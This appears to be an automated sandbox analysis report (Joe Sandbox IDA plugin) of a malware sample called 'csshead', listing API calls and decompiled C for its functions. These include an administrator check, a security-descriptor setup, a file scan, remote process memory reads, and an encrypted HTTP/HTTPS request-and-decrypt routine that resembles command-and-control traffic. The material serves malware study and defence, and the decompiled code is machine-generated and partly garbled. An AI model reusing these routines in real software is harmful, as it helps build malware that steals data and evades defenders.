Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D

GetWindowTextA.USER32(?,00000000,00000001), ref: 00418279
SetWindowTextA.USER32(?,00433C2B), ref: 00418285
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004182AC
GlobalFix.KERNEL32(00000000), ref: 004182B9
GlobalUnWire.KERNEL32(00000000), ref: 004182D4
SysFreeString.OLEAUT32(00000000), ref: 00418309
lstrlen.KERNEL32(00000000), ref: 0041833E

Part of subcall function 00410680: SysFreeString.OLEAUT32(00000000), ref: 00410749
Part of subcall function 00410680: SysAllocString.OLEAUT32(?), ref: 00410778

SysFreeString.OLEAUT32(00000000), ref: 004183FC
SetWindowLongA.USER32(?,000000EB,?), ref: 00418421
SysFreeString.OLEAUT32(00000000), ref: 00418438
NtdllDefWindowProc_A.NTDLL(?,00000000,?,?), ref: 00418462

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00417ED0, Relevance: 19.8, APIs: 13, Instructions: 265comnativestring

APIs

SetWindowLongA.USER32(?,000000EC,00000000), ref: 00417F2E
GetWindowLongA.USER32(?,000000EB), ref: 00417F3F
OleUninitialize.OLE32 ref: 00417F51
OleInitialize.OLE32(00000000), ref: 00417F5E
GetWindowTextLengthA.USER32(?), ref: 00417F68

Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D

GetWindowTextA.USER32(?,00000000,00000001), ref: 00417FB7
SetWindowTextA.USER32(?,00433C2A), ref: 00417FC3
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00417FEA
GlobalFix.KERNEL32(00000000), ref: 00417FF7
GlobalUnWire.KERNEL32(00000000), ref: 00418012
lstrlen.KERNEL32(00000000), ref: 00418031

Part of subcall function 00410680: SysFreeString.OLEAUT32(00000000), ref: 00410749
Part of subcall function 00410680: SysAllocString.OLEAUT32(?), ref: 00410778

SetWindowLongA.USER32(?,000000EB,?), ref: 00418139
NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00418176

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 004041C8, Relevance: 15.1, APIs: 10, Instructions: 87
thread

C-Code - Quality: 100%

			E004041C8(intOrPtr* __eax) {
				char _v5;
				void* _v12;
				void* _v16;
				long _v20;
				void* _v24;
				signed int _v28;
				int _v32;
				char _v36;
				void* _t52;

				 *__eax =  *__eax + __eax;
				_v5 = 0;
				_v32 = OpenThreadToken(GetCurrentThread(), 8, 0xffffffff,  &_v12);
				if(_v32 == 0 && GetLastError() == 0x3f0) {
					_v32 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
				}
				if(_v32 != 0) {
					_v16 = E004013DC(0x400);
					_v32 = GetTokenInformation(_v12, 2, _v16, 0x400,  &_v20);
					CloseHandle(_v12);
					if(_v32 != 0) {
						AllocateAndInitializeSid(0x40a2a4, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24);
						_t52 =  *_v16 - 1;
						if(_t52 >= 0) {
							_v36 = _t52 + 1;
							_v28 = 0;
							while(EqualSid(_v24,  *(_v16 + 4 + _v28 * 8)) == 0) {
								_v28 = _v28 + 1;
								_t28 =  &_v36;
								 *_t28 = _v36 - 1;
								if( *_t28 != 0) {
									continue;
								}
								goto L11;
							}
							_v5 = 1;
						}
						L11:
						FreeSid(_v24);
					}
					E00401440(_v16);
				}
				return _v5;
			}

0x004041ca
0x004041d2
0x004041eb
0x004041f2
0x00404214
0x00404214
0x0040421b
0x0040422b
0x00404247
0x0040424e
0x00404258
0x00404278
0x00404283
0x00404286
0x00404289
0x0040428c
0x00404293
0x004042b2
0x004042b5
0x004042b5
0x004042b8
0x00000000
0x00000000
0x00000000
0x004042b8
0x004042ac
0x004042ac
0x004042ba
0x004042be
0x004042be
0x004042c7
0x004042c7
0x004042d2

APIs

GetCurrentThread.KERNEL32 ref: 004041DE
OpenThreadToken.ADVAPI32(00000000), ref: 004041E5
GetLastError.KERNEL32 ref: 004041F4
GetCurrentProcess.KERNEL32 ref: 00404207
OpenProcessToken.ADVAPI32(00000000), ref: 0040420E

Part of subcall function 004013DC: GetProcessHeap.KERNEL32(00000000,?), ref: 004013EB
Part of subcall function 004013DC: RtlAllocateHeap.NTDLL(00000000), ref: 004013F2

GetTokenInformation.ADVAPI32(?,00000002,?,00000400,?), ref: 00404241
CloseHandle.KERNEL32(?), ref: 0040424E
AllocateAndInitializeSid.ADVAPI32(0040A2A4,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00404278
EqualSid.ADVAPI32(?,?), ref: 004042A2
FreeSid.ADVAPI32(?), ref: 004042BE

Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00420B80, Relevance: 10.6, APIs: 7, Instructions: 138window

APIs

GetWindowLongA.USER32(?,000000F0), ref: 00420B8F
GetWindowLongA.USER32(?,000000F0), ref: 00420BD1
IsWindowVisible.USER32(?), ref: 00420C04
IsIconic.USER32(?), ref: 00420C1C
ShowWindow.USER32(?,000000FF), ref: 00420C4A
GetWindowLongA.USER32(?,000000F0), ref: 00420C73
GetParent.USER32(000000FF), ref: 00420CE8

Part of subcall function 00419340: GetParent.USER32(?), ref: 00419379
Part of subcall function 00419340: DrawMenuBar.USER32(00000000), ref: 00419380

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 004239DD, Relevance: 9.1, APIs: 6, Instructions: 92library

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 00423A06
GetSystemInfo.KERNEL32(?), ref: 00423A1E
GetModuleHandleW.KERNEL32(00436BE8), ref: 00423A2E
GetProcAddress.KERNEL32(00000000,00436BD0), ref: 00423A3E
VirtualAlloc.KERNEL32(?,-00000001,00001000,00000004), ref: 00423A90
VirtualProtect.KERNEL32(?,-00000001,00000104,?), ref: 00423AA5

Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00404406, Relevance: 9.1, APIs: 6, Instructions: 85

C-Code - Quality: 64%

			E00404406(intOrPtr* __eax, struct _SECURITY_DESCRIPTOR* __edx) {
				intOrPtr* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				struct _ACL* _v16;
				void* _v20;
				int _v24;
				int _v28;
				struct _ACL* _v32;
				intOrPtr _t37;
				signed int _t38;
				signed int _t50;
				signed int _t59;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = 0;
				if(InitializeSecurityDescriptor(_v12, 1) != 0 && SetSecurityDescriptorDacl(_v12, 0xffffffff, 0, 0) != 0) {
					_t37 =  *0x40a0d4; // 0x401cb4
					_t38 =  *0x40b32c(_t37, 1,  &_v20, 0);
					asm("sbb eax, eax");
					if( ~( ~_t38) == 0) {
						_v20 = 0xffffffff;
					} else {
						_v32 = 0;
						_t50 = GetSecurityDescriptorSacl(_v20,  &_v24,  &_v32,  &_v28);
						asm("sbb eax, eax");
						if( ~( ~_t50) == 0) {
							L6:
							LocalFree(_v20);
							_v20 = 0xffffffff;
						} else {
							_t59 = SetSecurityDescriptorSacl(_v12, _v24, _v32, _v28);
							asm("sbb eax, eax");
							if( ~( ~_t59) == 0) {
								goto L6;
							}
						}
					}
					if(_v8 != 0) {
						 *_v8 = 0xc;
						 *(_v8 + 4) = _v12;
						 *((intOrPtr*)(_v8 + 8)) = 0;
					}
					_v16 = _v20;
				}
				return _v16;
			}

0x0040440e
0x00404411
0x00404416
0x00404427
0x0040444d
0x00404453
0x0040445b
0x00404461
0x004044bb
0x00404463
0x00404465
0x00404478
0x00404480
0x00404486
0x004044a8
0x004044ac
0x004044b2
0x00404488
0x00404498
0x004044a0
0x004044a6
0x00000000
0x00000000
0x004044a6
0x00404486
0x004044c6
0x004044cb
0x004044d7
0x004044df
0x004044df
0x004044e5
0x004044e5
0x004044ee

APIs

InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0040441F
SetSecurityDescriptorDacl.ADVAPI32(?,000000FF,00000000,00000000), ref: 00404437
ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401CB4,00000001,?,00000000), ref: 00404453
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404478
SetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 00404498
LocalFree.KERNEL32(?), ref: 004044AC

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00405640, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137

C-Code - Quality: 91%

			E00405640(char* __eax, void* __ecx, void* __edx) {
				char* _v8;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char* _v32;
				struct _WIN32_FIND_DATAA _v352;
				char _v609;
				char _v866;
				intOrPtr _t68;
				int _t81;
				intOrPtr _t89;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t131;
				void* _t133;
				void* _t134;
				void* _t135;

				_v8 = __eax;
				_v12 = 0;
				 *_v8 = 0;
				 *0x40b21c(0,  &_v609, 0x1a, 0xffffffff);
				_t68 =  *0x40a188; // 0x401e60
				E0040133C( &_v609, _t68);
				_t135 = _t134 + 8;
				_v352.dwFileAttributes = 0x80;
				_v16 = FindFirstFileA( &_v609,  &_v352);
				 *((char*)(_t133 + E004012DC( &_v609) - 0x25e)) = 0;
				if(_v16 == 0xffffffff) {
					L12:
					FindClose(_v16);
					return _v12;
				} else {
					goto L1;
				}
				do {
					L1:
					if(_v352.cFileName == 0x2e) {
						goto L11;
					}
					E00401308( &_v866,  &_v609);
					E0040133C( &_v866,  &(_v352.cFileName));
					_t89 =  *0x40a178; // 0x401e20
					E0040133C( &_v866, _t89);
					_t135 = _t135 + 0x10;
					if(E00403988( &_v866) == 0) {
						goto L11;
					}
					_v24 = E004047AC( &_v866,  &_v20);
					if(_v24 <= 0) {
						goto L11;
					}
					 *((char*)(_v20 + _v24)) = 0;
					_t127 =  *0x40a17c; // 0x401e2c
					_v28 = E00401110(_v20, _t127);
					if(_v28 == 0) {
						E00401828(_v20);
						goto L11;
					}
					_v28 = _v28 + 0xd;
					if( *_v28 == 0x31) {
						_t128 =  *0x40a180; // 0x401e3c
						_v28 = E00401110(_v20, _t128);
						if(_v28 != 0) {
							_v28 = _v28 + 0xe;
							_v32 = E00401110(_v28, E0040584C);
							 *_v32 = 0;
							E00401308(_v8, _v28);
							 *_v32 = 0x22;
							_t131 =  *0x40a184; // 0x401e4c
							_v28 = E00401110(_v20, _t131);
							if(_v28 != 0) {
								_v28 = _v28 + 0x12;
								_v32 = E00401110(_v28, 0x405850);
								 *_v32 = 0;
								E0040133C(_v8, 0x405854);
								E0040133C(_v8, _v28);
								_v12 = 0xffffffff;
							}
						}
					}
					E00401828(_v20);
					goto L12;
					L11:
					_t81 = FindNextFileA(_v16,  &_v352);
					asm("sbb eax, eax");
				} while ( ~( ~_t81) != 0);
				goto L12;
			}

0x00405649
0x0040564e
0x00405654
0x00405664
0x0040566a
0x00405677
0x0040567c
0x0040567f
0x0040569d
0x004056ab
0x004056b7
0x00405839
0x0040583d
0x00405849
0x00000000
0x00000000
0x00000000
0x004056bd
0x004056bd
0x004056c4
0x00000000
0x00000000
0x004056d6
0x004056e9
0x004056f1
0x004056fe
0x00405703
0x00405713
0x00000000
0x00000000
0x00405727
0x0040572e
0x00000000
0x00000000
0x0040573a
0x0040573e
0x0040574c
0x00405753
0x00405815
0x00000000
0x00405815
0x00405759
0x00405763
0x00405769
0x00405777
0x0040577e
0x00405784
0x00405795
0x0040579b
0x004057a4
0x004057ac
0x004057af
0x004057bd
0x004057c4
0x004057c6
0x004057d7
0x004057dd
0x004057e9
0x004057f9
0x00405801
0x00405801
0x004057c4
0x0040577e
0x0040580b
0x00000000
0x0040581a
0x00405825
0x0040582d
0x00405831
0x00000000

APIs

SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 00405664
FindFirstFileA.KERNEL32(?,00000080), ref: 00405697

Part of subcall function 00403988: FindFirstFileA.KERNEL32(?,?), ref: 004039A4
Part of subcall function 00403988: FindClose.KERNEL32(000000FF), ref: 004039BF

Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004047D9
Part of subcall function 004047AC: CreateFileA.KERNELBASE(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004047FB
Part of subcall function 004047AC: GetFileSize.KERNEL32(?,00000000), ref: 00404810
Part of subcall function 004047AC: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040483F
Part of subcall function 004047AC: CloseHandle.KERNEL32(?), ref: 00404849

Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A

FindNextFileA.KERNEL32(000000FF,00000080), ref: 00405825
FindClose.KERNEL32(000000FF), ref: 0040583D

Strings

., xrefs: 004056BD

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00429814, Relevance: 7.6, APIs: 5, Instructions: 58LIBRARYCODE

APIs

IsDebuggerPresent.KERNEL32 ref: 0042FAF6
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
GetCurrentProcess.KERNEL32 ref: 0042FB32
TerminateProcess.KERNEL32(00000000), ref: 0042FB39

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00404DE0, Relevance: 6.1, APIs: 4, Instructions: 69
native

C-Code - Quality: 100%

			E00404DE0(void* __eax, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				long _v16;
				void _v20;
				long _v24;
				void _v28;
				intOrPtr _v48;
				void _v52;

				_v8 = __eax;
				_v12 = 0;
				E00401258( &_v52, 0x18);
				_v16 = NtQueryInformationProcess(_v8, 0,  &_v52, 0x18, 0);
				if(_v16 == 0 && _v48 != 0) {
					_v20 = _v48 + 8;
					ReadProcessMemory(_v8, _v20,  &_v28, 4,  &_v24);
					_v20 = _v28 + 0x3c;
					ReadProcessMemory(_v8, _v20,  &_v20, 4,  &_v24);
					_v20 = _v20 + _v28 + 0x28;
					ReadProcessMemory(_v8, _v20,  &_v20, 4,  &_v24);
					_v12 = _v20 + _v28;
				}
				return _v12;
			}

0x00404de6
0x00404deb
0x00404df6
0x00404e0f
0x00404e16
0x00404e24
0x00404e39
0x00404e45
0x00404e5a
0x00404e69
0x00404e7e
0x00404e8a
0x00404e8a
0x00404e93

APIs

NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00404E09
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E39
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E5A
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E7E

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00417E60, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86comnativestring

APIs

Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960

Part of subcall function 00423991: RaiseException.KERNEL32(?,?,00423990,000000F4,?,?,?,?,00423990,000000F4,0043C9F8,00442BF0,000000F4,?,?,00000000), ref: 004239D3

Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D

Part of subcall function 00410680: SysFreeString.OLEAUT32(00000000), ref: 00410749
Part of subcall function 00410680: SysAllocString.OLEAUT32(?), ref: 00410778

SetWindowLongA.USER32(?,000000EC,00000000), ref: 00417F2E
GetWindowLongA.USER32(?,000000EB), ref: 00417F3F
OleUninitialize.OLE32 ref: 00417F51
OleInitialize.OLE32(00000000), ref: 00417F5E
GetWindowTextLengthA.USER32(?), ref: 00417F68
GetWindowTextA.USER32(?,00000000,00000001), ref: 00417FB7
SetWindowTextA.USER32(?,00433C2A), ref: 00417FC3
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00417FEA
GlobalFix.KERNEL32(00000000), ref: 00417FF7
GlobalUnWire.KERNEL32(00000000), ref: 00418012
lstrlen.KERNEL32(00000000), ref: 00418031
SetWindowLongA.USER32(?,000000EB,?), ref: 00418139
NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00418176

Strings

(XC, xrefs: 00417EC1

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00424FEB, Relevance: 4.6, APIs: 3, Instructions: 75LIBRARYCODE

APIs

IsDebuggerPresent.KERNEL32(?,00000001,00000000), ref: 004250D5
SetUnhandledExceptionFilter.KERNEL32(00000000,?,00000001,00000000), ref: 004250DF
UnhandledExceptionFilter.KERNEL32(?,?,00000001,00000000), ref: 004250EC

Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(0043A498), ref: 0042FB16
Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39

Memory Dump Source

Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_csshead.jbxd

Function 00405D20, Relevance: 4.2, Strings: 3, Instructions: 433
Crypto

C-Code - Quality: 98%

			E00405D20(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr _a24, char _a28, intOrPtr* _a32, intOrPtr* _a36) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				signed int _v76;
				char _v168;
				char _v184;
				char _v200;
				char _v204;
				char _v269;
				char _v285;
				char _v301;
				char _v317;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				char _v336;
				char _v849;
				intOrPtr _t239;
				signed int _t250;
				char _t255;
				intOrPtr _t256;
				intOrPtr _t257;
				intOrPtr _t259;
				signed int _t330;
				intOrPtr _t436;
				intOrPtr _t438;
				void* _t470;

				_v8 = 0;
				if(_a16 == 0) {
					L40:
					return _v8;
				}
				_v64 = 0;
				if(_a20 == 0) {
					__eflags = 0;
					_v28 = 0;
					L9:
					_v60 = E00401110(_a16, E0040633C);
					_t474 = _v60;
					if(_v60 == 0) {
						goto L40;
					}
					_v32 = _v60 - _a16;
					E004012B8( &_v269, _v32, _a16);
					 *((char*)(_t470 + _v32 - 0x109)) = 0;
					E00401308( &_v849, _v60);
					E004054B8( &_v849, _v60, _t474);
					E00405858( &_v301, 0x10);
					E00405858( &_v317, 0x10);
					E004012B8( &_v184, 0x10,  &_v301);
					E004012B8( &_v200, 0x10,  &_v317);
					_v204 = _a28;
					if(_a12 != 0) {
						E004012B8( &_v168, 0x51, _a12);
					}
					E004017E8( &_v48, 0, 0, 0xf0000000, 1);
					E004018A0(_v48, 0x94, _a8,  &_v56, 0, 0);
					_v32 = 0x75;
					E00401AB0(_v56, 0xffffffffffffffff, 0, 0x80,  &_v32,  &_v204, 0);
					E00401AF8(_v56);
					E00401B20(_v48, 0);
					E00401268( &_v204, 0x80);
					_t239 =  *0x40a1c0; // 0x401f00
					_v12 = E00403864(_t239, _v28, _v64, 0, 0);
					_v28 = 1;
					E0040170C(_v12,  &_v28, 0x46, 4);
					_v28 = 0x1770;
					E0040170C(_v12,  &_v28, 2, 4);
					_v28 = 0x1f40;
					E0040170C(_v12,  &_v28, 6, 4);
					E0040170C(_v12,  &_v28, 5, 4);
					_v28 = 1;
					_t250 = E0040170C(_v12,  &_v28, 0x4d, 4);
					asm("sbb eax, eax");
					if( ~( ~_t250) == 0) {
						_v76 = 1;
						_v72 = 0;
						E0040170C(0,  &_v76, 0x32, 8);
					}
					if(_a4 == 0) {
						_v28 = 0x50;
					} else {
						_v28 = 0x1bb;
					}
					_v16 = E0040161C(_v12, _v28,  &_v269, 0, 0, 3, 0, 0);
					if(_a4 == 0) {
						_v28 = 0x4600000;
					} else {
						_v28 = 0x4e03000;
					}
					_t255 =  *0x40a1c4; // 0x401f48
					_v336 = _t255;
					_t256 =  *0x40a1c8; // 0x401f54
					_v332 = _t256;
					_t257 =  *0x40a1cc; // 0x401f6c
					_v328 = _t257;
					_v324 = 0;
					_t259 =  *0x40a23c; // 0x40209c
					_t436 =  *0x40a1ac; // 0x401ed4
					_v20 = E00401660(_v16,  &_v849, _t436, 0, _v28,  &_v336, 0, _t259);
					if(_a4 != 0) {
						_v32 = 4;
						E004016D8(_v20,  &_v28, 0x1f,  &_v32);
						_v28 = _v28 | 0x00000100;
						E0040170C(_v20,  &_v28, 0x1f, 4);
					}
					_t482 = _a24;
					if(_a24 == 0) {
						_v68 = E004013DC(_v32 + 0x80);
						_t397 = 0x80;
						E004012B8(_v68, 0x80,  &_v204);
						__eflags = 0;
						_v32 = 0;
					} else {
						E00405894(_a24,  &_v301, _a28, _t482,  &_v32, 0);
						_v68 = E004013DC(_v32 + 0x80);
						E004012B8(_v68, 0x80,  &_v204);
						_t397 =  &_v301;
						E00405894(_a24,  &_v301, _a28, _t482,  &_v32, _v68 + 0x80);
					}
					_t438 =  *0x40a1d0; // 0x401f70
					if(E004015E4(_v20, _t397 | 0xffffffff, _t438, _v32 + 0x80, _v68) != 0) {
						E00401440(_v68);
						_v32 = 4;
						_v24 = 0;
						_v28 = 0;
						E004039CC(_v20,  &_v24, 0x20000013,  &_v28,  &_v32);
						__eflags = _v24 - 0x12e;
						if(_v24 != 0x12e) {
							goto L39;
						}
						_v40 = E004013DC(0x1000);
						__eflags = 0;
						_v36 = 0;
						while(1) {
							_v44 = E004016A4(_v20, 0,  &_v32, 0);
							asm("sbb eax, eax");
							__eflags =  ~( ~_v44);
							if( ~( ~_v44) == 0) {
								goto L39;
							}
							__eflags = _v44;
							if(_v44 == 0) {
								continue;
							}
							__eflags = _v32;
							if(_v32 == 0) {
								__eflags = _v36 - 0x20;
								if(_v36 >= 0x20) {
									 *_a32 = E004013DC(_v36 + 1);
									 *_a36 = _v36;
									E004059BC(_v40 + 0x10,  &_v317, _v36 - 0x10, _a36,  *_a32);
									E004017E8( &_v48, 0, 0, 0xf0000000, 1);
									E00401374(_v48, 0, 0x8003,  &_v52, 0);
									E00401404(_v52, 0x10,  &_v301, 0);
									E00401404(_v52, 0x10,  &_v317, 0);
									E00401404(_v52, E004012DC( &_v269),  &_v269, 0);
									E00401404(_v52,  *_a36,  *_a32, 0);
									_v32 = 0x10;
									E00401490(_v52,  &_v285, 2, 0,  &_v32);
									E004014D0(_v52);
									E00401B20(_v48, 0);
									_t330 = E004011F8( &_v285, 0x10, _v40);
									__eflags = _t330;
									if(_t330 != 0) {
										E00401440(_v40);
										 *((char*)( *_a32 +  *_a36)) = 0;
										_v8 = 0xffffffff;
									} else {
										E00401440(_v40);
										E00401440( *_a32);
										 *_a32 = 0;
										 *_a36 = 0;
									}
								} else {
									E00401440(_v40);
								}
								goto L39;
							}
							__eflags = _v36 + _v32 - 0x200000;
							if(_v36 + _v32 > 0x200000) {
								goto L39;
							}
							_v40 = E00401460(_v40, _v36 + _v32);
							E004015B0(_v20, _v32, _v40 + _v36,  &_v32);
							_v36 = _v36 + _v32;
						}
						goto L39;
					} else {
						E00401440(_v68);
						L39:
						E0040151C(_v20);
						E0040151C(_v16);
						E0040151C(_v12);
						goto L40;
					}
				}
				if( *_a20 != 1) {
					__eflags =  *_a20 - 2;
					if( *_a20 != 2) {
						__eflags =  *_a20 - 3;
						if( *_a20 != 3) {
							goto L40;
						}
						_v28 = 3;
						_v64 = _a20 + 4;
						goto L9;
					}
					_v28 = 0;
				} else {
					_v28 = 1;
				}
			}

0x00405d2b
0x00405d32
0x00406332
0x00406338
0x00406338
0x00405d3a
0x00405d41
0x00405d81
0x00405d83
0x00405d86
0x00405d93
0x00405d96
0x00405d9a
0x00000000
0x00000000
0x00405da6
0x00405db5
0x00405dbd
0x00405dce
0x00405dd9
0x00405de9
0x00405df9
0x00405e0f
0x00405e25
0x00405e2d
0x00405e37
0x00405e47
0x00405e47
0x00405e5a
0x00405e72
0x00405e77
0x00405e98
0x00405ea0
0x00405eaa
0x00405eba
0x00405ecb
0x00405ed6
0x00405ed9
0x00405eed
0x00405ef2
0x00405f06
0x00405f0b
0x00405f1f
0x00405f31
0x00405f36
0x00405f4a
0x00405f51
0x00405f57
0x00405f59
0x00405f62
0x00405f71
0x00405f71
0x00405f7a
0x00405f85
0x00405f7c
0x00405f7c
0x00405f7c
0x00405fa8
0x00405faf
0x00405fba
0x00405fb1
0x00405fb1
0x00405fb1
0x00405fc1
0x00405fc6
0x00405fcc
0x00405fd1
0x00405fd7
0x00405fdc
0x00405fe4
0x00405fea
0x00406005
0x00406013
0x0040601a
0x0040601c
0x00406032
0x00406037
0x0040604b
0x0040604b
0x00406050
0x00406054
0x004060bd
0x004060c6
0x004060ce
0x004060d3
0x004060d5
0x00406056
0x00406068
0x0040607a
0x0040608b
0x0040609d
0x004060a9
0x004060a9
0x004060e8
0x004060f8
0x0040610a
0x0040610f
0x00406118
0x0040611d
0x00406133
0x00406138
0x0040613f
0x00000000
0x00000000
0x0040614f
0x00406152
0x00406154
0x00406157
0x00406166
0x0040616e
0x00406172
0x00406174
0x00000000
0x00000000
0x0040617a
0x0040617e
0x00000000
0x00000000
0x00406180
0x00406184
0x004061c5
0x004061c9
0x004061e4
0x004061ec
0x0040620a
0x0040621d
0x00406232
0x00406247
0x0040625c
0x00406279
0x0040628d
0x00406292
0x004062ad
0x004062b5
0x004062bf
0x004062d2
0x004062d7
0x004062d9
0x00406300
0x0040630f
0x00406313
0x004062db
0x004062de
0x004062e8
0x004062f2
0x004062f9
0x004062f9
0x004061cb
0x004061ce
0x004061ce
0x00000000
0x004061c9
0x0040618c
0x00406191
0x00000000
0x00000000
0x004061a5
0x004061b8
0x004061c0
0x004061c0
0x00000000
0x004060fa
0x004060fd
0x0040631a
0x0040631d
0x00406325
0x0040632d
0x00000000
0x0040632d
0x004060f8
0x00405d49
0x00405d57
0x00405d5a
0x00405d66
0x00405d69
0x00000000
0x00000000
0x00405d6f
0x00405d7c
0x00000000
0x00405d7c
0x00405d5e
0x00405d4b
0x00405d4b
0x00405d4b

Strings

u, xrefs: 00405E77
, xrefs: 004061C5
P, xrefs: 00405F85

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
